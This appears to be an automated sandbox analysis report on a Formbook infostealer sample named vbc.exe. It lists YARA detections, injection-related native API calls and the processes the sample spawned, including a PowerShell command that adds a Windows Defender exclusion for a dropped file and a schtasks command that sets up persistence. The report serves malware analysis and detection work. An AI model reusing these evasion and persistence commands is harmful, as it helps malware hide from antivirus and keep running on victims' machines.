Source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Uses 32bit PE files
Source: vbc.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Yara signature match
Source: 8.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 8.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 8.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 8.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 8.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 8.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 8.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 8.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.vbc.exe.3bfcd00.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.vbc.exe.3bfcd00.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 8.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 8.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.vbc.exe.3bb72e0.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.vbc.exe.3bb72e0.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_0295E970 0_2_0295E970
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_0295E96C 0_2_0295E96C
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_0295CF94 0_2_0295CF94
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_04FCDD66 0_2_04FCDD66
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_04FCD9C0 0_2_04FCD9C0
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_04FCEDB0 0_2_04FCEDB0
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_04FCEE51 0_2_04FCEE51
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_04FC4F49 0_2_04FC4F49
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_04FCF0C2 0_2_04FCF0C2
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_04FC9CA8 0_2_04FC9CA8
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_04FC9C98 0_2_04FC9C98
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_00401030 8_2_00401030
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0041C130 8_2_0041C130
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0041C9A5 8_2_0041C9A5
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0041BABE 8_2_0041BABE
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_00408C7B 8_2_00408C7B
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0041C4E6 8_2_0041C4E6
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_00408C80 8_2_00408C80
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_00402D87 8_2_00402D87
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_00402D90 8_2_00402D90
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_00402FB0 8_2_00402FB0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017F0D20 8_2_017F0D20
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017FF900 8_2_017FF900
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01814120 8_2_01814120
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018C1D55 8_2_018C1D55
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0180B090 8_2_0180B090
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018B1002 8_2_018B1002
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0182EBB0 8_2_0182EBB0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01816E30 8_2_01816E30
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02B5C9A5 20_2_02B5C9A5
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02B42FB0 20_2_02B42FB0
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02B48C80 20_2_02B48C80
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02B48C7B 20_2_02B48C7B
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02B42D90 20_2_02B42D90
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02B42D87 20_2_02B42D87
Contains functionality to call native functions
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_004185E0 NtCreateFile, 8_2_004185E0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_00418690 NtReadFile, 8_2_00418690
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_00418710 NtClose, 8_2_00418710
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_004187C0 NtAllocateVirtualMemory, 8_2_004187C0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_004187C2 NtAllocateVirtualMemory, 8_2_004187C2
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018399A0 NtCreateSection,LdrInitializeThunk, 8_2_018399A0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018395D0 NtClose,LdrInitializeThunk, 8_2_018395D0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839910 NtAdjustPrivilegesToken,LdrInitializeThunk, 8_2_01839910
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839540 NtReadFile,LdrInitializeThunk, 8_2_01839540
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018398F0 NtReadVirtualMemory,LdrInitializeThunk, 8_2_018398F0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839840 NtDelayExecution,LdrInitializeThunk, 8_2_01839840
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839860 NtQuerySystemInformation,LdrInitializeThunk, 8_2_01839860
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839780 NtMapViewOfSection,LdrInitializeThunk, 8_2_01839780
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018397A0 NtUnmapViewOfSection,LdrInitializeThunk, 8_2_018397A0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839FE0 NtCreateMutant,LdrInitializeThunk, 8_2_01839FE0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839710 NtQueryInformationToken,LdrInitializeThunk, 8_2_01839710
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018396E0 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_018396E0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839A00 NtProtectVirtualMemory,LdrInitializeThunk, 8_2_01839A00
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839A20 NtResumeThread,LdrInitializeThunk, 8_2_01839A20
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839A50 NtCreateFile,LdrInitializeThunk, 8_2_01839A50
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839660 NtAllocateVirtualMemory,LdrInitializeThunk, 8_2_01839660
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018399D0 NtCreateProcessEx, 8_2_018399D0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018395F0 NtQueryInformationFile, 8_2_018395F0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839520 NtWaitForSingleObject, 8_2_01839520
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0183AD30 NtSetContextThread, 8_2_0183AD30
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839950 NtQueueApcThread, 8_2_01839950
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839560 NtWriteFile, 8_2_01839560
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018398A0 NtWriteVirtualMemory, 8_2_018398A0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839820 NtEnumerateKey, 8_2_01839820
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0183B040 NtSuspendThread, 8_2_0183B040
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0183A3B0 NtGetContextThread, 8_2_0183A3B0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839B00 NtSetValueKey, 8_2_01839B00
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0183A710 NtOpenProcessToken, 8_2_0183A710
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839730 NtQueryVirtualMemory, 8_2_01839730
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839760 NtOpenProcess, 8_2_01839760
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839770 NtSetInformationFile, 8_2_01839770
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0183A770 NtOpenThread, 8_2_0183A770
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839A80 NtOpenDirectoryObject, 8_2_01839A80
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018396D0 NtCreateKey, 8_2_018396D0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839610 NtEnumerateValueKey, 8_2_01839610
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839A10 NtQuerySection, 8_2_01839A10
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839650 NtQueryValueKey, 8_2_01839650
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839670 NtQueryInformationProcess, 8_2_01839670
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02B58690 NtReadFile, 20_2_02B58690
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02B587C0 NtAllocateVirtualMemory, 20_2_02B587C0
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02B58710 NtClose, 20_2_02B58710
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02B585E0 NtCreateFile, 20_2_02B585E0
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02B587C2 NtAllocateVirtualMemory, 20_2_02B587C2
Sample file is different than original file name gathered from version info
Source: vbc.exe Binary or memory string: OriginalFilename vs vbc.exe
Source: vbc.exe, 00000000.00000002.263973483.0000000000D39000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs vbc.exe
Source: vbc.exe, 00000000.00000002.267729856.0000000005CB0000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameUI.dll@ vs vbc.exe
Source: vbc.exe, 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameHResult.dll6 vs vbc.exe
Source: vbc.exe Binary or memory string: OriginalFilename vs vbc.exe
Source: vbc.exe, 00000008.00000002.344710455.0000000001A7F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs vbc.exe
Source: vbc.exe, 00000008.00000002.344023750.000000000139A000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameHelp.Exej% vs vbc.exe
Source: vbc.exe Binary or memory string: OriginalFilenameICollecti.exeB vs vbc.exe
Source: vbc.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: uZlkYhlkeLeaKC.exe.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\vbc.exe File read: C:\Users\user\Desktop\vbc.exe
Source: vbc.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\vbc.exe "C:\Users\user\Desktop\vbc.exe"
Source: C:\Users\user\Desktop\vbc.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\vbc.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uZlkYhlkeLeaKC" /XML "C:\Users\user\AppData\Local\Temp\tmpAA68.tmp
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\vbc.exe Process created: C:\Users\user\Desktop\vbc.exe C:\Users\user\Desktop\vbc.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
Source: C:\Users\user\Desktop\vbc.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe
Source: C:\Users\user\Desktop\vbc.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uZlkYhlkeLeaKC" /XML "C:\Users\user\AppData\Local\Temp\tmpAA68.tmp
Source: C:\Users\user\Desktop\vbc.exe Process created: C:\Users\user\Desktop\vbc.exe C:\Users\user\Desktop\vbc.exe
Source: C:\Users\user\Desktop\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Users\user\Desktop\vbc.exe File created: C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe
Source: C:\Users\user\Desktop\vbc.exe File created: C:\Users\user\AppData\Local\Temp\tmpAA68.tmp
Source: classification engine Classification label: mal100.troj.evad.winEXE@10/8@14/6
Source: C:\Users\user\Desktop\vbc.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: vbc.exe Joe Sandbox Cloud Basic: Detection: clean Score: 0
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6760:120:WilError_01
